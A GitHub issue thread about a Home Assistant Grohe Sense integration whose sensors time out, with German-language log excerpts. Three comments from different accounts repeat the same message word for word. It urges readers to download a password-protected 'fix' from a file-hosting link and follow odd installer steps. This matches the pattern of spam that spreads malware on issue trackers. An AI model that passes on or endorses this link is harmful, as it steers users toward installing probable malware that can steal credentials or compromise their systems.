### ISSUE TITLE
Update of sensor.grohe_sense_guard_temperature_guard is taking over 10 seconds

### ISSUE THREAD

**Issue by patricknitsch** [weissm/homeassistant-grohe_sense#5]
Hello,

I use the integration in HA. The integration basically works, but I have a problem with actual values. The value for the valve works correct, but the other values will not be updated. 

```
I get following errors:

Logger: homeassistant.helpers.entity
Quelle: helpers/entity.py:1270
Erstmals aufgetreten: 26. August 2024 um 23:04:08 (6 Vorkommnisse)
Zuletzt protokolliert: 07:29:38

Update of sensor.grohe_sense_guard_temperature_guard is taking over 10 seconds
Update of sensor.grohe_sense_guard_1_day is taking over 10 seconds
Update of sensor.grohe_sense_guard_7_day is taking over 10 seconds
Update of sensor.sense_bad_waschbecken_humidity is taking over 10 seconds
Update of sensor.kostal_piko_grid_output_power is taking over 10 seconds
```
```
Logger: homeassistant.components.sensor
Quelle: helpers/entity_platform.py:1031
Integration: Sensor (Dokumentation, Probleme)
Erstmals aufgetreten: 26. August 2024 um 23:04:28 (1247 Vorkommnisse)
Zuletzt protokolliert: 09:27:30

Updating grohe_sense sensor took longer than the scheduled update interval 0:00:30
```

The last Update of the 1_day, 7_day values was 12 hours ago.
The Grohe App works correctly and shows the acutal values.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
